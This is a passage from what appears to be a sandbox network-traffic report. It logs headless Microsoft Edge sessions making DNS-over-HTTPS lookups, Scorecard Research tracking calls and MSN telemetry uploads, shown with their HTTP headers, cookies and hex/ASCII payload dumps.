                                                                                                                                                                                                                                                                                                                  CF-RAY: 8ff39304ffa93344-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomHc)


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  10192.168.2.460880172.64.41.34438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:23 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8ff39305285342e7-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fa 50 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom'P)


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  11192.168.2.46086018.244.18.274438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:24 UTC933OUTGET /b?rn=1736416763900&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0F21C4DE7A1B6788277DD1B17BB36680&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:24 UTC956INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:24 GMT
                                                                                                                                                                                                                                                                                                                  Location: /b2?rn=1736416763900&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0F21C4DE7A1B6788277DD1B17BB36680&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                                  set-cookie: UID=1454398e939674cb6b4e57f1736416764; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                                  set-cookie: XID=1454398e939674cb6b4e57f1736416764; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                  Via: 1.1 5c21b2b6b5e8901cc7633407000764f0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: DZAWicZK5hvmPyNK3_waht9bCZABeAzib9SKqbW0zwyP7HfS15VjOA==


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  12192.168.2.46089018.238.49.744438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:25 UTC1020OUTGET /b2?rn=1736416763900&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0F21C4DE7A1B6788277DD1B17BB36680&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: UID=1454398e939674cb6b4e57f1736416764; XID=1454398e939674cb6b4e57f1736416764
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:25 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:25 GMT
                                                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                  Via: 1.1 e3d2c542026df7b9357e3b591c889f64.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: 9IoFheg84fMnF49DVxmk4rGsU8AM4bn4Wvvxonqati2Qfz4CavwF3A==


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  13192.168.2.46089120.42.65.934438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:25 UTC1090OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736416763898&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 3854
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=0F21C4DE7A1B6788277DD1B17BB36680; _EDGE_S=F=1&SID=02BA5CD7B7DE65FD0E7049B8B6C764A6; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:25 UTC3854OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 30 39 3a 35 39 3a 32 33 2e 38 39 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 35 39 31 38 65 33 64 2d 32 61 38 30 2d 34 62 35 36 2d 62 39 66 62 2d 39 31 34 34 37 39 64 37 34 36 62 34 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 33 37 31 35 37 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-09T09:59:23.893Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"55918e3d-2a80-4b56-b9fb-914479d746b4","epoch":"25371570"},"app":{"locale":
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:25 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=625060979bdb48d08c72ff6b0ba63c83&HASH=6250&LV=202501&V=4&LU=1736416765898; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 09:59:25 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=f03a1b97cb6647bba3edd6335937fbd4; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 10:29:25 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  time-delta-millis: 2000
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:25 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  14192.168.2.46090420.110.205.1194438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:25 UTC1279OUTGET /c.gif?rnd=1736416763899&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b22f4747dbd8407584046bcaed3aa480&activityId=b22f4747dbd8407584046bcaed3aa480&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0125A3251C5C420C9BB6786682DD1947&MUID=0F21C4DE7A1B6788277DD1B17BB36680 HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: c.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=0F21C4DE7A1B6788277DD1B17BB36680; _EDGE_S=F=1&SID=02BA5CD7B7DE65FD0E7049B8B6C764A6; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:26 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                  Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  ETag: "dda11c98eb61db1:0"
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                  P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MUID=0F21C4DE7A1B6788277DD1B17BB36680; domain=.msn.com; expires=Tue, 03-Feb-2026 09:59:26 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                  Set-Cookie: SRM_M=0F21C4DE7A1B6788277DD1B17BB36680; domain=c.msn.com; expires=Tue, 03-Feb-2026 09:59:26 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 16-Jan-2025 09:59:26 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                  Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 09-Jan-2025 10:09:26 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:25 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Length: 42
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:26 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  15192.168.2.46092220.42.65.934438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:27 UTC1034OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736416766247&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 10917
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=0F21C4DE7A1B6788277DD1B17BB36680; _EDGE_S=F=1&SID=02BA5CD7B7DE65FD0E7049B8B6C764A6; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:27 UTC10917OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 30 39 3a 35 39 3a 32 36 2e 32 34 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 35 39 31 38 65 33 64 2d 32 61 38 30 2d 34 62 35 36 2d 62 39 66 62 2d 39 31 34 34 37 39 64 37 34 36 62 34 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 33 37 31 35 37 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T09:59:26.245Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"55918e3d-2a80-4b56-b9fb-914479d746b4","epoch":"25371570"},"app":{"locale":
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:27 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=f4bf72c1955c43b6bcb0aac68fd5822c&HASH=f4bf&LV=202501&V=4&LU=1736416767269; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 09:59:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=ef93110e4d43486897238a903254225b; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 10:29:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  time-delta-millis: 1022
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:26 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  16192.168.2.46092120.42.65.934438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:27 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736416766249&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 4753
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
